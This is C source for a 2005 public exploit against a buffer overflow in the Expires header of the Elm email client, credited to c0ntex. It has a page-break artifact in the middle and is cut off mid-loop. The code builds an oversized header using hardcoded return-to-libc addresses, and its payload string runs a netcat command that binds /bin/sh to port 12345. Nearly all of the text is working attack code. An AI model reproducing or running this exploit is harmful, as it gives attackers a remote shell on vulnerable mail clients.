1 /*
2
3 Exploit code for the bug posted by Ulf Harnhammar (metaurtelia.com)
4 http://archives.neohapsis.com/archives/fulldisclosure/2005−08/0688.html
5
6 Probably you will need to change SYSLOC and STRLOC to work on your box
7
8 */
9
10
11 #include <stdio.h>
12 #include <stdlib.h>
13 #include <string.h>
14 #include <unistd.h>
15
16 #define BUFFER 83
17 #define EMAIL "tmpmail"
18 #define STRING "‘nc −l −p 12345 −e /bin/sh‘&##"
19 #define SYSLOC 0x42041e50
20 #define STRLOC 0x4001a207
21 #define EXTLOC 0x4202b0f0
22
23 char expire[]="\x45\x78\x70\x69\x72\x65\x73\x3A\x20";
24
25 int main(int argc, char **argv)
26 {
27 char buffer[BUFFER];
28 char *email = NULL;
29 char *user = NULL;
30 int i;
31 long extloc, sysloc, strloc;
32 FILE *fp;
33
34 if(argc != 2) {
35 puts("Usage: ./elmex <user@where.com>");
36 exit(EXIT_FAILURE);
37 }
38
39 if(strlen(argv[1]) > 50) {
40 puts("[−] Sorry, email address too long!");
41 exit(EXIT_FAILURE);
42 }
43
44 user = (char *)malloc(strlen(argv[1]));
45 if(!user) {
46 perror("malloc");
47 exit(EXIT_FAILURE);
48 }
49
50 email = EMAIL;
51
52 memset(user, ’\0’, strlen(argv[1]));
Page 1/3
Elm 2.5.8 Expires Header Remote Buffer Overflow Exploit
c0ntex
08/22/2005
53 memcpy(user, argv[1], strlen(argv[1]));
54
55 puts("\nExploit for elm email client < 2.5.8 overflow in Expires field");
56 puts("Tested: Redhat on quiet a Sunday by c0ntex[at]open−security.org\n");
57
58 extloc = EXTLOC;
59 sysloc = SYSLOC;
60 strloc = STRLOC;
61
62 memset(buffer, ’\0’, BUFFER);
63 memcpy(buffer, expire, strlen(expire));
64
65 for(i = strlen(expire); i < 53; i++)
66 *(buffer+i) = 0x41;
67 for(i = 53; i < 57; i += 4)
68 *(long *)&buffer[i] = sysloc;
69 for(i = 57; i < 61; i++)
70 *(long *)&buffer[i] = extloc;
71 for(i = 61; i < 65; i +=